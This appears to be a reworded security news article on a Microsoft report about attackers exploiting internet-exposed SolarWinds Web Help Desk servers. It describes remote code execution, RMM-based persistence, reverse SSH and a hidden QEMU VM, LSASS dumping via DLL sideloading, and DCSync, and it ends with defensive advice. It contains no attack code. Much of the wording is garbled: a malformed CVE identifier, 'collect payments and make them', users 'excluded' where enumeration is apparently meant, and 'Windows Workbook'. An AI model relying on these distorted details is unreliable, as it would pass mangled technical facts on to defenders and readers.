SolarWinds Web Help Desk Used for RCE in Multi-Phase Attacks on Exposed Servers
Microsoft revealed that it has seen a multi-stage intrusion involving malicious actors using the Internet-exposed instances of SolarWinds Web Help Desk (WHD) to gain initial access and move laterally across the organization’s network to other high-value assets.
That said, the Microsoft Defender Security Research Team said it’s not clear whether the exploit has recently disclosed flaws (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1), or a previously released vulnerability (CVE2-9:920, CVSS)
“Since this attack took place in December 2025 and on machines vulnerable to both old and new CVEs at the same time, we cannot reliably confirm the CVE used to find the first location,” the company said in a report published last week.
While CVE-2025-40536 is a security control vulnerability that could allow an unauthenticated attacker to access certain restricted functionality, CVE-2025-40551 and CVE-2025-26399 both refer to an untrusted data deletion vulnerability that could lead to remote code execution.
Last week, the Cybersecurity and Infrastructure Security Agency (CISA) of the US added CVE-2025-40551 to its catalog known as Known Exploited Vulnerabilities (KEV), citing evidence of an active exploit in the wild. Federal Civilian Executive Branch (FCEB) agencies were ordered to implement the correction by February 6, 2026.
In the attack discovered by Microsoft, successful exploitation of the exposed SolarWinds WHD instance allowed attackers to obtain unauthorized remote code execution and execute arbitrary commands within the context of the WHD application.
“After being successfully exploited, the vulnerable service of the WHD instance created PowerShell to exploit BITS. [Background Intelligent Transfer Service] in order to collect payments and make them,” noted researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini.
In the next step, the threat actors download official components related to Zoho ManageEngine, a legitimate remote monitoring and management (RMM) solution, to enable continuous remote control of the infected system. The attackers followed you through a series of actions –
- Sensitive domain users and groups are excluded, including Domain Administrators.
- Persistence set up with reverse SSH and RDP access, and the attackers also tried to create a scheduled task to launch the QEMU virtual machine under the SYSTEM account at system startup to close tracks inside the virtual environment while revealing SSH access through port forwarding.
- DLL sideloading was used on other hosts by using “wab.exe,” an official executable program associated with the Windows Workbook, to launch a malicious DLL (“sspicli.dll”) to dump the contents of LSASS memory and carry out credential theft.
In at least one case, Microsoft said that threat actors have carried out a DCSync attack, in which a Domain Controller (DC) is impersonated to request password hashes and other sensitive information from an Active Directory (AD) database.
To counter the threat, users are advised to keep WHD instances up-to-date, find and remove any unauthorized RMM tools, swap service and management accounts, and isolate compromised machines to limit breaches.
“This work shows a common but high-impact pattern: a single exposed application can pave the way to full domain compromise when the vulnerability is not deployed or is insufficiently monitored,” the Windows maker said.
“In these attacks, attackers rely heavily on survival techniques, legitimate management tools, and low-noise persistence methods. These tradecraft options reinforce the importance of defense-in-depth, timely patching of Internet-facing services, and behavior-based detection at all identity, endpoint, and network layers.”
